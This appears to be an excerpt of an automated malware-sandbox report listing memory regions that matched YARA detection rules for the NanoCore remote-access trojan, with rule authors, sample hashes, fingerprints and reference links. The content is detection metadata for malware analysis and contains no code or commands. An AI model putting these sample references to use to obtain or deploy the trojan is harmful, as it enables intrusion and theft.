Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
